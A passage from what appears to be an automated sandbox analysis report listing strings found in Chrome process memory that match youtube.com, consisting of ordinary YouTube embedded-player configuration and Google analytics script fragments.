layerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24
Source: chrome.exe, 00000000.00000002.2487618019.000028EC03BAC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: DM?www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsl equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2321018206.000028EC04C90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Data_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Dw4s4cEMn3rwUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D","ROOT_VE_TYPE":16623,"CLIENT_PROTOCOL":"h2","CLIENT_TRANSPORT":"tcp","TIME_CREATED_MS":1747926390752,"VALID_SESSION_TEMPDATA_DOMAINS":["youtu.be","youtube.com","www.youtube.com","web-green-qa.youtube.com","web-release-qa.youtube.com","web-integration-qa.youtube.com","m.youtube.com","mweb-green-qa.youtube.com","mweb-release-qa.youtube.com","mweb-integration-qa.youtube.com","studio.youtube.com","studio-green-qa.youtube.com","studio-integration-qa.youtube.com"],"LOTTIE_URL":{"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue":"https://www.youtube.com/s/desktop/fc303b88/jsbin/lottie-light.vflset/lottie-light.js"},"IDENTITY_MEMENTO":{"visitor_data":"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D"},"PLAYER_VARS":{"embedded_player_response":"{\"responseContext\":{\"serviceTrackingParams\":[{\"service\":\"CSI\",\"params\":[{\"key\":\"c\",\"value\":\"WEB_EMBEDDED_PLAYER\"},{\"key\":\"cver\",\"value\":\"1.20250519.22.00\"},{\"key\":\"yt_li\",\"value\":\"0\"},{\"key\":\"GetEmbeddedPlayer_rid\",\"value\":\"0xecabdd26d7a3e0d8\"}]},{\"service\":\"GFEEDBACK\",\"params\":[{\"key\":\"logged_in\",\"value\":\"0\"}]},{\"service\":\"GUIDED_HELP\",\"params\":[{\"key\":\"logged_in\",\"value\":\"0\"}]},{\"service\":\"ECATCHER\",\"params\":[{\"key\":\"client.version\",\"value\":\"20250519\"},{\"key\":\"client.name\",\"value\":\"WEB_EMBEDDED_PLAYER\"}]}]},\"embedPreview\":{\"thumbnailPreviewRenderer\":{\"title\":{\"runs\":[{\"text\":\"Science of THRIVE Approach\"}]},\"defaultThumbnail\":{\"thumbnails\":[{\"url\":\"https://i.ytimg.com/vi_webp/gobWGqPjLSQ/default.webp\",\"width\":120,\"height\":90},{\"url\":\"https://i.ytimg.com/vi/gobWGqPjLSQ/hqdefault.jpg?sqp\u003d-oaymwEbCKgBEF5IVfKriqkDDggBFQAAiEIYAXABwAEG\\u0026rs\u003dAOn4CLBWcAvV-oZl8DrOaiFDGLelfGE3nw\",\"width\":168,\"height\":94},{\"url\":\"https://i.ytimg.com/vi/gobWGqPjLSQ/hqdefault.jpg?sqp\u003d-oaymwEbCMQBEG5IVfKriqkDDggBFQAAiEIYAXABwAEG\\u0026rs\u003dAOn4CLBnosSpiH6IEk8c4gUPSJnKCwA5Mg\",\"width\":196,\"height\":110},{\"url\":\"https://i.ytimg.com/vi/gobWGqPjLSQ/hqdefault.jpg?sqp\u003d-oaymwEcCPYBEIoBSFXyq4qpAw4IARUAAIhCGAFwAcABBg\u003d\u003d\\u0026rs\u003dAOn4CLDKjW3iUxtvM1O0A9dJSBlCgChwPw\",\"width\":246,\"height\":138},{\"url\":\"https://i.ytimg.com/vi_webp/gobWGqPjLSQ/mqdefault.webp\",\"width\":320,\"height\":180},{\"url\":\"https://i.ytimg.com/vi/gobWGqPjLSQ/hqdefault.jpg?sqp\u003d-oaymwEcCNACELwBSFXyq4qpAw4IARUAAIhCGAFwAcABBg\u003d\u003d\\u0026rs\u003dAOn4CLBYvhTEjWfX6lqGhUNGtBQ3N68E6Q\",\"width\":336,\"height\":188},{\"url\":\"https://i.ytimg.com/vi_webp/gobWGqPjLSQ/hqdefault.webp\",\"width\":480,\"height\":360}]},\"playButton\":{\"buttonRenderer\":{\"style\":\"STYLE_DEFAULT\",\"size\":\"SIZE_DEFAULT\",\"isDisabled\":false,\"navigationEndpoint\":{\"clickTrackingParams\":\"CAkQ8FsiEwiMl_WcrbeNAxWsT0wIHTChJmY\u003d\",\"watchEndpoint\":{\"videoId\":\"gobWGqPjLSQ\"}},\"accessibility\":{\"label\":\"Play Science of THRIVE Approach
Source: chrome.exe, 00000000.00000003.2370451846.000028EC04B44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370551942.000028EC038DF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: E=https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341031480.000028EC06930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: E=https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2370628411.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025E7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2471255420.000028EC02708000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: E=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: E=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377854851.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377894851.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2371291317.000028EC08030000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: E=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2320456301.000028EC04810000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: E=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352226880.000028EC041A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: E_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Eu();dp(function(){a();ap(b)||ln(a,b)},b)},Eu=function(){return[L.m.V,L.m.W]},Fu=/^(?:www\.)?google(?:\.com?)?(?:\.[a-z]{2}t?)?$/,Gu=/^www\.googleadservices\.com$/,Ku=/^gad_source[_=](\d+)$/;function Pu(){return lp("dedupe_gclid",function(){return cs()})};var Qu=/^(www\.)?google(\.com?)?(\.[a-z]{2}t?)?$/,Ru=/^www.googleadservices.com$/;function Su(a){a||(a=Tu());return a.cq?!1:a.Zo||a.ap||a.ep||a.bp||a.Qf||a.Mo||a.cp||a.Ro?!0:!1}function Tu(){var a={},b=Is(!0);a.cq=!!b._up;var c=cu();a.Zo=c.aw!==void 0;a.ap=c.dc!==void 0;a.ep=c.wbraid!==void 0;a.bp=c.gbraid!==void 0;a.cp=c.gclsrc==="aw.ds";a.Qf=Cu().Qf;var d=y.referrer?Dk(Jk(y.referrer),"host"):"";a.Ro=Qu.test(d);a.Mo=Ru.test(d);return a};function Uu(a){var b=window,c=b.webkit;delete b.webkit;a(b.webkit);b.webkit=c}function Vu(a){var b={action:"gcl_setup"};if("CWVWebViewMessage"in a.messageHandlers)return a.messageHandlers.CWVWebViewMessage.postMessage({command:"awb",payload:b}),!0;var c=a.messageHandlers.awb;return c?(c.postMessage(b),!0):!1};function Wu(){return["ad_storage","ad_user_data"]}function Xu(a){if(E(38)&&!bo(Xn.xl)&&"webkit"in window&&window.webkit.messageHandlers){var b=function(){try{Uu(function(c){c&&("CWVWebViewMessage"in c.messageHandlers||"awb"in c.messageHandlers)&&(ao(Xn.xl,function(d){d.gclid&&gu(d.gclid,a)}),Vu(c)||O(178))})}catch(c){O(177)}};kn(function(){Gt(Wu())?b():ln(b,Wu())},Wu())}};var Yu=["https://www.google.com","https://www.youtube.com","https://m.youtube.com"]; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF68D000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: H l.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false},\"rk\",\"mk\"],[[[[\"c\"],[null,1],[null,0],[\"O43z0dpjhgX20SCx4KAo\"],[\"CLEn\"]],[null,825.6999999999825]]]],[\"/client_streamz/bg/po/csc\",null,[\"cs\",\"mk\"],[[[[null,2],[\"CLEn\"]],[1]]]],[\"/client_streamz/bg/po/ctav\",null,[\"av\",\"mk\"],[[[[\"m\"],[\"CLEn\"]],[1]]]]]]",null,null,null,null,null,null,14400,null,null,null,null,null,1]],"1747926392080"] equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352192649.000028EC04A69000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2393613989.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352226880.000028EC041A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: H4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2393613989.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: H4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352226880.000028EC041A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: H4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}E_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352192649.000028EC04A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: H4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}iginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323134548.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 